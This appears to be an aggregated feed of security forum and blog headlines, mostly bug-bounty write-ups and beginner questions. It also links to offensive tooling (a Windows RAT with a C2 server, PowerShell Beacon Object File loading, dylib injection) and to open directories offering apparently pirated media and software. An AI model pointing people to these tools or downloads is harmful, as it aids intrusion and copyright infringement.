    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way? To see whether camera is being used or not? If I'm using (for example: Snapchat) to take a picture/video, then can other camera apps on my phone like Tiktok/Kiradroid/WhatsApp camera also be turned on simultaneously ? Is it possible for other camera apps to see what I'm recording on Snapchat? note- On Tiktok's permission : run foreground service is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in intranet?
    Is it generally safe to hide insecure servers(like a REST API server without authentication, no JWT no basic Auth) in intranet(or docker network without publishing the port)? What kind of risk will I be exposed to? Let say I have server A, B and C, and I will publish and expose server A to public, and I only want server B and C to be reached by server A. Is it safe to keep server B and C in intranet(server A will be in that intranet as well, but exposed to public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual sim or cloning ? How can one get proof of this that is admissible as evidence ?
    I am being stalked by my ex pretty sure she has screwed herself a army of tec savy individuals to help her. It’s been almost 2 years I just want to get proof or get her to leave me alone. So if someone was spoofing my phone listening to my calls is it a possibility that if they hung up before I was off the phone I could get a incoming call from the person I was talking to currently and there phone would suddenly start ringing like they called me again ? This phenomena has happened 3-5 times to me before I realized it has only happened sense my ex moved out she somehow had my phone cloned and was following me all over the internet as she could see where I was posting. I don’t think she could modify things on the phone like screen shots but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there one of them the Verizon app that allows you to supposedly hack a phone I of course deleted them. I watched the Google family app appear miraculously onto my phone screen at a concert while Trying to discern if that was my ex standing approximately 40 yards away who should’ve been home with our daughter. I moved into see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and told them outlandish lies to create problems, women I was talking to, follows me all over the internet posting where I post creating accounts where I have accounts all in the name of narc psychopath bs it was bad enough all the cheating that came to light and the mental abuse when we lived together now this shit. Any help would be great thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I’m studying for Sec+, and currently trying to understand the PKI and asymmetric encryption protocols. Say for example I encrypt a message using google’s public key to Google.com, and a MITM intercepts it. Why can’t the MITM decrypt the message using the public key when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
  • Open

    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Intresting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki Weekly (Issue 409) by ourren QingScan: a glue layer for vulnerability scanners by ourren For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts, this Christmas I played the “Yogosha CTF 2021” challenge as I got a mail from their team on 28th December, and I…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone, this is Ayush, and from today, 01–01–2022, I’m going to start the 100daysofhacking challenge to improve my hacking skills. So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

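    CaptfEncoder v3.0.1, a cross-platform network security tool suite
    CaptfEncoder is a cross-platform network security tool suite. The V3 release is developed in Rust; the executable is small, and it is faster, better performing and more capable.  ( 1 min )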

  • Open

    Quick question
    I am a novice, please go easy on me for asking this lol. If I am asked to assign an IPv4 to a PC NIC, what does this look like in CLI? Is this the same as simply assigning an IP to the PC itself or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Masters degree, good and cheap ones?
    Don't ask why, I know most companies don't give a crap, I know they prefer experience, etc... Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good masters degree program I can do part time and online (or at least one that is ABET\would make managers who only care about ABET happy). I am both looking at computer science and cybersecurity masters, but I got a B.S. in cybersecurity which makes masters of computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online masters (though I seriously doubt they will let me in the computer science program so I will have to do the cybersecurity one). I keep digging around but it seems all the ones I can find either charge high rates, and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that its that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, And I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact?
    I am trying to understand how to best prevent bruteforcing attacks on various externally accessible services. If you limit the amount of attempts for a given account, then you solve the bruteforcing quandary but introduce another attack vector where someone can indefinitely lock legitimate users out of their accounts by just knowing their username. You can limit it by something like IP, but there have been several real world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could identify legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which it was accessed and allow login attempts from that IP even if the user is locked out. However that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    What is fuzzing? Why is it used?!
    Fuzzing is one of the most important activities that hackers, or #BugHunters, or better to say #PenTesters, use to… Continue reading on Medium »  ( 1 min )
  • Open

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake [link] [comments]
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake [link] [comments]  ( 1 min )
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]  ( 1 min )
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    various stuff
    Music (amateur bands, I guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) Christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1 [link] [comments]
  • Open

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell [link] [comments]
  • Open

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva [link] [comments]
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans [link] [comments]  ( 3 min )
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster [link] [comments]
  • Open

    How i was able to bypass a Pin code Protection
    Hello guys,  I Hope all are doing good. my name is kerolos sameh(AKA xko2x) , I’m 17 years old bug hunter in hackerone. Continue reading on Medium »  ( 2 min )
    He is already here: Privileges escalation due to invalidating current users
    Dear his/her we back again our story today is about privileges escalation This vulnerability enables the unauthorized user to add an… Continue reading on Medium »  ( 2 min )
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »  ( 2 min )
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem.. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »  ( 6 min )
  • Open

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation (web crawling) by ourren For more recent articles, visit SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »  ( 2 min )
  • Open

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »  ( 3 min )
  • Open

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006 [link] [comments]  ( 1 min )
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1 [link] [comments]  ( 1 min )

  • Open

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12  ( 4 min )
  • Open

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana [link] [comments]  ( 1 min )
    My First Contribution
    Here's a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321 [link] [comments]
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Iron Maiden albums zipped - (SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    What is OSINT?
    OSINT (Open Source Intelligence) means open-source intelligence. In short, we can say it is a passive information-gathering tool. Passive… Continue reading on Medium »  ( 2 min )
  • Open

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »  ( 5 min )
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »  ( 3 min )
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »  ( 5 min )
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »  ( 1 min )
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »  ( 3 min )
  • Open

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49  ( 3 min )
  • Open

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu [link] [comments]  ( 1 min )
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj [link] [comments]  ( 1 min )
  • Open

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell [link] [comments]
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor [link] [comments]
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-01-01 Review
    A summary of security architecture in 2021 and an outlook on security directions for 2022 by ourren For more recent articles, visit SecWiki
  • Open

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1's network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work. I understand that it's class B, which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated, thank you! submitted by /u/crumbjuice [link] [comments]  ( 2 min )
  • Open

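    How to use ChopChop to scan endpoints and identify exposed sensitive content
    Helps researchers perform dynamic application testing against web applications.  ( 1 min )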

  • Open

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP ports on my ISP's router firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doesn't have many options besides disabling incoming & outgoing and setting custom rules. Should I just disable incoming ICMP? What can I do, if anything, that will increase security of ICMP? submitted by /u/Wind0ze_User [link] [comments]  ( 2 min )
    Tiktok
    1. Is it true that TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3. If this is true, then how is that even legal to spy on users? Especially minors, who use this app more. submitted by /u/hamza_37 [link] [comments]  ( 3 min )
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from playstore or not? I downloaded many strange apps from google playstore ,uninstalled them and ran a Malwarebytes scan and nothing bad showed up, should I still be worried? submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    About blockchain dapps security
    Hello, I'm a pen testing student doing my OSCP right now and I'm interested in blockchain and dapp security/pentesting. Is there a roadmap? What skills must I acquire to get me there besides learning a dapp language like Plutus or Solidity? Thanks in advance! submitted by /u/GeorgiosSAK [link] [comments]  ( 1 min )
  • Open

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 8 min )
    OSINT tweets liked by @aqfiazfan in Jan — Dec 2021
    I always use the likes feature on Twitter as an important cabinet for storing OSINT-related information that I find interesting… Continue reading on Medium »  ( 1 min )
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »  ( 5 min )
  • Open

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 10 min )
  • Open

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard [link] [comments]  ( 1 min )
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more stuff since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB ​ submitted by /u/techleves [link] [comments]  ( 1 min )
    Top 250 IMDb movies - but see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1 [link] [comments]
    runaways comics
    submitted by /u/International_Milk_1 [link] [comments]
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Comics - Google Drive (lets see if this last any longer)
    submitted by /u/International_Milk_1 [link] [comments]
    some vertigo comics
    submitted by /u/International_Milk_1 [link] [comments]
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13 [link] [comments]  ( 1 min )
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn [link] [comments]
  • Open

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
  • Open

    Javascript 101 — Comparison & Conditions — 04
    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »  ( 3 min )
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »  ( 2 min )
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »  ( 4 min )
  • Open

    SecWiki News 2021-12-31 Review
    Long read: a brief ten-year history of the Internet of Things by ourren Typora license decryption and analysis by ourren For more recent articles, visit SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

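    FreeBuf Morning Report | 77TB of Kyoto University data accidentally deleted; 5 major cybersecurity trends to watch in 2022
    Kyoto University in Japan posted a notice on its website that, due to an error in the backup system of its HP supercomputer, the university lost about 77TB of research data.  ( 1 min )
    FreeBuf in-house security group discussion | Year-end review: 2021 for in-house security practitioners
    Which events this year left a deep impression on you, what did they make you think about, and what is your view of the industry's current state and direction? Or even talk about the profession itself: what are your plans for your future career?  ( 1 min )
    FreeBuf Weekly | "14th Five-Year" National Informatization Plan released; Apache fixes critical vulnerabilities
    We have summarized and recommended this week's hot news, quality articles and handy tools, so that you don't miss any of this week's highlights!  ( 1 min )
    Analysis of the Kimsuky group's phishing campaign targeting the South Korean news industry
    Kimsuky is a cyber-espionage group suspected to originate from the Korean peninsula; it has been active since at least 2012.  ( 1 min )
    Why reducing friction between developers and security teams helps improve software security
    Rather than postponing security until later, make it a core part of the development process.
    Penetration testing, foundation services: service attack and defense, the Struts2 framework (part 1)
    Struts2 is a web framework under the Apache project, widely used by Internet, government and enterprise portal sites such as Alibaba and JD.com.  ( 1 min )
    New malware, the iLOBleed rootkit, targets HP iLO firmware for the first time
    iLOBleed is the first malware ever to target HP iLO firmware.  ( 1 min )
    HP supercomputer system error in Japan: as much as 77TB of Kyoto University data accidentally deleted
    Kyoto University in Japan posted a notice on its website stating that, due to an error in the backup system of its HP supercomputer, the university lost about 77TB of research data.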
  • Open

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor [link] [comments]

  • Open

    Movies and TV, but not sure how much in English. Seems to be very slow.
    submitted by /u/International_Milk_1 [link] [comments]
    Racer X stuff
    submitted by /u/International_Milk_1 [link] [comments]
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the Flair "Could get you killed" Just pick any of the default flairs, enter it in document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1 [link] [comments]
    comics, and Ebooks
    submitted by /u/International_Milk_1 [link] [comments]
    Kamen Rider Build BD Box Complete Series [1080p] - English subs
    submitted by /u/International_Milk_1 [link] [comments]
    Star Trek films, movies, comics, etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1 [link] [comments]
    Bond movies (not sure if this is the correct link) - see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Games (don't know if links work)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    comics
    submitted by /u/International_Milk_1 [link] [comments]
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus [link] [comments]
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, JavaScript and so on? Thank you!! submitted by /u/g-simon [link] [comments]  ( 1 min )
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare right? Thanks in advance! submitted by /u/dowitex [link] [comments]  ( 1 min )
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617 [link] [comments]  ( 1 min )
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    hello everyone I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself : " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…  ( 4 min )
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the role (example: homelab, CTFs, GitHub projects)? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76 [link] [comments]  ( 1 min )
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425 [link] [comments]  ( 2 min )
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger [link] [comments]
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
